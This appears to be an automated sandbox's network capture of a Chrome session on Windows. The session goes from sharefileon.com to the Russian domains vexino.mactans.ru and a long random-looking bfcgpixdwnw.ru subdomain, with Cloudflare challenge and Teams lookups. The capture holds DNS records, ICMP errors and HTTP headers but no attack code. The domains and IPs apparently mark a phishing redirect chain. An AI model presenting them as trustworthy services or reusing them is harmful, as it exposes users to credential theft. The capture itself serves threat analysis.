                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.095562935 CET53564641.1.1.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.096807003 CET53593501.1.1.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.112090111 CET53519381.1.1.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.113096952 CET53623561.1.1.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:06.444632053 CET5111553192.168.2.181.1.1.1
                                                                                                                                                                                                                          Dec 17, 2024 18:21:06.444782019 CET5034453192.168.2.181.1.1.1
                                                                                                                                                                                                                          Dec 17, 2024 18:21:06.583739042 CET53511151.1.1.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:06.584049940 CET53503441.1.1.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:15.259044886 CET53517461.1.1.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:19.773469925 CET4918553192.168.2.181.1.1.1
                                                                                                                                                                                                                          Dec 17, 2024 18:21:19.773611069 CET6337453192.168.2.181.1.1.1
                                                                                                                                                                                                                          Dec 17, 2024 18:21:20.127769947 CET53491851.1.1.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:20.128123999 CET53633741.1.1.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:23.539026022 CET5104853192.168.2.181.1.1.1
                                                                                                                                                                                                                          Dec 17, 2024 18:21:23.539185047 CET5338253192.168.2.181.1.1.1
                                                                                                                                                                                                                          Dec 17, 2024 18:21:23.678076029 CET53533821.1.1.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:23.678107977 CET53510481.1.1.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:36.424818993 CET53654381.1.1.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:38.315979004 CET53632771.1.1.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:51.161581993 CET138138192.168.2.18192.168.2.255
                                                                                                                                                                                                                          Dec 17, 2024 18:22:06.447205067 CET5756353192.168.2.181.1.1.1
                                                                                                                                                                                                                          Dec 17, 2024 18:22:06.447360992 CET5062053192.168.2.181.1.1.1
                                                                                                                                                                                                                          Dec 17, 2024 18:22:08.937513113 CET53498401.1.1.1192.168.2.18
                                                                                                                                                                                                                          TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                          Dec 17, 2024 18:20:41.100682020 CET192.168.2.181.1.1.1c28a(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                          Dec 17, 2024 18:21:23.771357059 CET192.168.2.181.1.1.1c292(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                          Dec 17, 2024 18:20:37.103549004 CET192.168.2.181.1.1.10x2f9Standard query (0)sharefileon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:20:37.103703976 CET192.168.2.181.1.1.10x48bfStandard query (0)sharefileon.com65IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:20:38.754374027 CET192.168.2.181.1.1.10xf7bcStandard query (0)sharefileon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:20:38.754589081 CET192.168.2.181.1.1.10xec7eStandard query (0)sharefileon.com65IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:20:40.672939062 CET192.168.2.181.1.1.10x71f2Standard query (0)img1.wsimg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:20:40.673178911 CET192.168.2.181.1.1.10xcea2Standard query (0)img1.wsimg.com65IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:20:40.812486887 CET192.168.2.181.1.1.10xa229Standard query (0)isteam.wsimg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:20:40.812666893 CET192.168.2.181.1.1.10x3f3cStandard query (0)isteam.wsimg.com65IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:20:41.108767986 CET192.168.2.181.1.1.10xbc12Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:20:41.108930111 CET192.168.2.181.1.1.10xd77Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:20:43.425456047 CET192.168.2.181.1.1.10x3893Standard query (0)img1.wsimg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:20:43.425614119 CET192.168.2.181.1.1.10x2faStandard query (0)img1.wsimg.com65IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:20:54.153918982 CET192.168.2.181.1.1.10x741bStandard query (0)vexino.mactans.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:20:54.154071093 CET192.168.2.181.1.1.10x6078Standard query (0)vexino.mactans.ru65IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.172755003 CET192.168.2.181.1.1.10xac9fStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.173038006 CET192.168.2.181.1.1.10x1eddStandard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.173927069 CET192.168.2.181.1.1.10x88a4Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.174074888 CET192.168.2.181.1.1.10x4684Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.174352884 CET192.168.2.181.1.1.10x5c8fStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.174468994 CET192.168.2.181.1.1.10xe855Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.304064035 CET192.168.2.181.1.1.10x9badStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.304208994 CET192.168.2.181.1.1.10x57ffStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.441543102 CET192.168.2.181.1.1.10x4f8bStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.441747904 CET192.168.2.181.1.1.10x1144Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.956562042 CET192.168.2.181.1.1.10x72bbStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.956700087 CET192.168.2.181.1.1.10x8fadStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.972873926 CET192.168.2.181.1.1.10xc51cStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.973169088 CET192.168.2.181.1.1.10xd424Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:06.444632053 CET192.168.2.181.1.1.10x4371Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:06.444782019 CET192.168.2.181.1.1.10x4562Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:19.773469925 CET192.168.2.181.1.1.10x2963Standard query (0)weuutkdxx65sbffqe71rl8qvlydf19t1muxwamupghhtsvpbyzhhl6du.bfcgpixdwnw.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:19.773611069 CET192.168.2.181.1.1.10x2e2cStandard query (0)weuutkdxx65sbffqe71rl8qvlydf19t1muxwamupghhtsvpbyzhhl6du.bfcgpixdwnw.ru65IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:23.539026022 CET192.168.2.181.1.1.10xf8dfStandard query (0)weuutkdxx65sbffqe71rl8qvlydf19t1muxwamupghhtsvpbyzhhl6du.bfcgpixdwnw.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:23.539185047 CET192.168.2.181.1.1.10x4e8fStandard query (0)weuutkdxx65sbffqe71rl8qvlydf19t1muxwamupghhtsvpbyzhhl6du.bfcgpixdwnw.ru65IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:22:06.447205067 CET192.168.2.181.1.1.10x3b05Standard query (0)teams.nel.measure.office.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:22:06.447360992 CET192.168.2.181.1.1.10x9c85Standard query (0)teams.nel.measure.office.net65IN (0x0001)false
                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                          Dec 17, 2024 18:20:37.522907972 CET1.1.1.1192.168.2.180x2f9No error (0)sharefileon.com76.223.105.230A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:20:37.522907972 CET1.1.1.1192.168.2.180x2f9No error (0)sharefileon.com13.248.243.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:20:38.892471075 CET1.1.1.1192.168.2.180xf7bcNo error (0)sharefileon.com13.248.243.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:20:38.892471075 CET1.1.1.1192.168.2.180xf7bcNo error (0)sharefileon.com76.223.105.230A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:20:40.812728882 CET1.1.1.1192.168.2.180x71f2No error (0)img1.wsimg.comglobal-wildcard.wsimg.com.sni-only.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:20:41.100608110 CET1.1.1.1192.168.2.180xcea2No error (0)img1.wsimg.comglobal-wildcard.wsimg.com.sni-only.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:20:41.130084991 CET1.1.1.1192.168.2.180xa229No error (0)isteam.wsimg.com13.126.107.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:20:41.130084991 CET1.1.1.1192.168.2.180xa229No error (0)isteam.wsimg.com3.111.68.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:20:41.246155977 CET1.1.1.1192.168.2.180xbc12No error (0)www.google.com142.250.181.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:20:41.246467113 CET1.1.1.1192.168.2.180xd77No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:20:43.563114882 CET1.1.1.1192.168.2.180x2faNo error (0)img1.wsimg.comglobal-wildcard.wsimg.com.sni-only.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:20:43.563908100 CET1.1.1.1192.168.2.180x3893No error (0)img1.wsimg.comglobal-wildcard.wsimg.com.sni-only.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:20:54.662528992 CET1.1.1.1192.168.2.180x6078No error (0)vexino.mactans.ru65IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:20:54.662906885 CET1.1.1.1192.168.2.180x741bNo error (0)vexino.mactans.ru172.67.208.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:20:54.662906885 CET1.1.1.1192.168.2.180x741bNo error (0)vexino.mactans.ru104.21.22.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.311371088 CET1.1.1.1192.168.2.180xac9fNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.311371088 CET1.1.1.1192.168.2.180xac9fNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.311371088 CET1.1.1.1192.168.2.180xac9fNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.311371088 CET1.1.1.1192.168.2.180xac9fNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.312644005 CET1.1.1.1192.168.2.180x4684No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.312822104 CET1.1.1.1192.168.2.180x5c8fNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.312822104 CET1.1.1.1192.168.2.180x5c8fNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.312833071 CET1.1.1.1192.168.2.180x88a4No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.312833071 CET1.1.1.1192.168.2.180x88a4No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.313148975 CET1.1.1.1192.168.2.180xe855No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.440994978 CET1.1.1.1192.168.2.180x57ffNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.444235086 CET1.1.1.1192.168.2.180x9badNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.444235086 CET1.1.1.1192.168.2.180x9badNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.579879045 CET1.1.1.1192.168.2.180x4f8bNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.579879045 CET1.1.1.1192.168.2.180x4f8bNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.579879045 CET1.1.1.1192.168.2.180x4f8bNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.579879045 CET1.1.1.1192.168.2.180x4f8bNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.095562935 CET1.1.1.1192.168.2.180x8fadNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.096807003 CET1.1.1.1192.168.2.180x72bbNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.096807003 CET1.1.1.1192.168.2.180x72bbNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.112090111 CET1.1.1.1192.168.2.180xc51cNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.112090111 CET1.1.1.1192.168.2.180xc51cNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:02.113096952 CET1.1.1.1192.168.2.180xd424No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:06.583739042 CET1.1.1.1192.168.2.180x4371No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:20.127769947 CET1.1.1.1192.168.2.180x2963No error (0)weuutkdxx65sbffqe71rl8qvlydf19t1muxwamupghhtsvpbyzhhl6du.bfcgpixdwnw.ru104.21.65.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:20.127769947 CET1.1.1.1192.168.2.180x2963No error (0)weuutkdxx65sbffqe71rl8qvlydf19t1muxwamupghhtsvpbyzhhl6du.bfcgpixdwnw.ru172.67.189.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:20.128123999 CET1.1.1.1192.168.2.180x2e2cNo error (0)weuutkdxx65sbffqe71rl8qvlydf19t1muxwamupghhtsvpbyzhhl6du.bfcgpixdwnw.ru65IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:23.678036928 CET1.1.1.1192.168.2.180xbca8No error (0)teams.office.comtmc-g2.tm-4.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:23.678036928 CET1.1.1.1192.168.2.180xbca8No error (0)tmc-g2.tm-4.office.comteams-office-com.s-0005.dual-s-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:23.678036928 CET1.1.1.1192.168.2.180xbca8No error (0)teams-office-com.s-0005.dual-s-msedge.nets-0005.dual-s-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:23.678036928 CET1.1.1.1192.168.2.180xbca8No error (0)s-0005.dual-s-msedge.net52.123.128.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:23.678036928 CET1.1.1.1192.168.2.180xbca8No error (0)s-0005.dual-s-msedge.net52.123.129.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:23.678076029 CET1.1.1.1192.168.2.180x4e8fNo error (0)weuutkdxx65sbffqe71rl8qvlydf19t1muxwamupghhtsvpbyzhhl6du.bfcgpixdwnw.ru65IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:23.678107977 CET1.1.1.1192.168.2.180xf8dfNo error (0)weuutkdxx65sbffqe71rl8qvlydf19t1muxwamupghhtsvpbyzhhl6du.bfcgpixdwnw.ru104.21.65.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:23.678107977 CET1.1.1.1192.168.2.180xf8dfNo error (0)weuutkdxx65sbffqe71rl8qvlydf19t1muxwamupghhtsvpbyzhhl6du.bfcgpixdwnw.ru172.67.189.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:23.771203995 CET1.1.1.1192.168.2.180xe537No error (0)teams.office.comtmc-g2.tm-4.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:23.771203995 CET1.1.1.1192.168.2.180xe537No error (0)tmc-g2.tm-4.office.comteams-office-com.s-0005.dual-s-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:46.109057903 CET1.1.1.1192.168.2.180xc609No error (0)teams.office.comtmc-g2.tm-4.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:46.109057903 CET1.1.1.1192.168.2.180xc609No error (0)tmc-g2.tm-4.office.comteams-office-com.s-0005.dual-s-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:46.109057903 CET1.1.1.1192.168.2.180xc609No error (0)teams-office-com.s-0005.dual-s-msedge.nets-0005.dual-s-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:46.109057903 CET1.1.1.1192.168.2.180xc609No error (0)s-0005.dual-s-msedge.net52.123.128.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:46.109057903 CET1.1.1.1192.168.2.180xc609No error (0)s-0005.dual-s-msedge.net52.123.129.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:46.109472990 CET1.1.1.1192.168.2.180xeb0cNo error (0)teams.office.comtmc-g2.tm-4.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:21:46.109472990 CET1.1.1.1192.168.2.180xeb0cNo error (0)tmc-g2.tm-4.office.comteams-office-com.s-0005.dual-s-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:22:06.587493896 CET1.1.1.1192.168.2.180x9c85No error (0)teams.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                          Dec 17, 2024 18:22:06.588671923 CET1.1.1.1192.168.2.180x3b05No error (0)teams.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                          • sharefileon.com
                                                                                                                                                                                                                          • https:
                                                                                                                                                                                                                            • vexino.mactans.ru
                                                                                                                                                                                                                            • code.jquery.com
                                                                                                                                                                                                                            • challenges.cloudflare.com
                                                                                                                                                                                                                            • cdnjs.cloudflare.com
                                                                                                                                                                                                                            • weuutkdxx65sbffqe71rl8qvlydf19t1muxwamupghhtsvpbyzhhl6du.bfcgpixdwnw.ru
                                                                                                                                                                                                                          • a.nel.cloudflare.com
                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          0192.168.2.184970276.223.105.23080676C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          Dec 17, 2024 18:20:37.651803970 CET430OUTGET / HTTP/1.1
                                                                                                                                                                                                                          Host: sharefileon.com
                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                          Dec 17, 2024 18:20:38.751660109 CET341INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                          location: https://sharefileon.com/
                                                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                                                          server: DPS/2.0.0+sha-8f288ca
                                                                                                                                                                                                                          x-version: 8f288ca
                                                                                                                                                                                                                          x-siteid: us-east-1
                                                                                                                                                                                                                          set-cookie: dps_site_id=us-east-1; path=/
                                                                                                                                                                                                                          etag: 5427b019f284145fb8fb4e0a244dc63b
                                                                                                                                                                                                                          date: Tue, 17 Dec 2024 17:20:38 GMT
                                                                                                                                                                                                                          keep-alive: timeout=5
                                                                                                                                                                                                                          transfer-encoding: chunked
                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          1192.168.2.184970376.223.105.23080676C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.569385052 CET233INHTTP/1.1 408 Request Time-out
                                                                                                                                                                                                                          Content-length: 110
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 38 20 52 65 71 75 65 73 74 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 64 69 64 6e 27 74 20 73 65 6e 64 20 61 20 63 6f 6d 70 6c 65 74 65 20 72 65 71 75 65 73 74 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                          Data Ascii: <html><body><h1>408 Request Time-out</h1>Your browser didn't send a complete request in time.</body></html>


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          2192.168.2.184970476.223.105.23080676C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.698678017 CET233INHTTP/1.1 408 Request Time-out
                                                                                                                                                                                                                          Content-length: 110
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 38 20 52 65 71 75 65 73 74 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 64 69 64 6e 27 74 20 73 65 6e 64 20 61 20 63 6f 6d 70 6c 65 74 65 20 72 65 71 75 65 73 74 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                          Data Ascii: <html><body><h1>408 Request Time-out</h1>Your browser didn't send a complete request in time.</body></html>


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          0192.168.2.184970613.248.243.5443676C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-12-17 17:20:40 UTC689OUTGET / HTTP/1.1
                                                                                                                                                                                                                          Host: sharefileon.com
                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                          Sec-Fetch-User: ?1
                                                                                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                          Cookie: dps_site_id=us-east-1
                                                                                                                                                                                                                          2024-12-17 17:20:40 UTC1092INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Link: <//img1.wsimg.com/ceph-p3-01/website-builder-data-prod/static/widgets/UX.4.47.0.js>; rel=preload; as=script; crossorigin,<https://img1.wsimg.com/gfonts/s/muli/v29/7Aulp_0qiz-aVz7u3PJLcUMYOFnOkEk30eg.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/quicksand/v31/6xKtdSZaM9iE8KbpRA_hK1QN.woff2>; rel=preload; as=font; crossorigin,<https://fonts.googleapis.com>; rel=preconnect; crossorigin,<https://fonts.gstatic.com>; rel=preconnect; crossorigin,<https://img1.wsimg.com>; rel=preconnect; crossorigin,<https://isteam.wsimg.com>; rel=preconnect; crossorigin
                                                                                                                                                                                                                          Cache-Control: max-age=30
                                                                                                                                                                                                                          Content-Security-Policy: frame-ancestors 'self' godaddy.com *.godaddy.com
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                                                                          Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Server: DPS/2.0.0+sha-8f288ca
                                                                                                                                                                                                                          X-Version: 8f288ca
                                                                                                                                                                                                                          X-SiteId: us-east-1
                                                                                                                                                                                                                          Set-Cookie: dps_site_id=us-east-1; path=/; secure
                                                                                                                                                                                                                          ETag: 5427b019f284145fb8fb4e0a244dc63b
                                                                                                                                                                                                                          Date: Tue, 17 Dec 2024 17:20:40 GMT
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
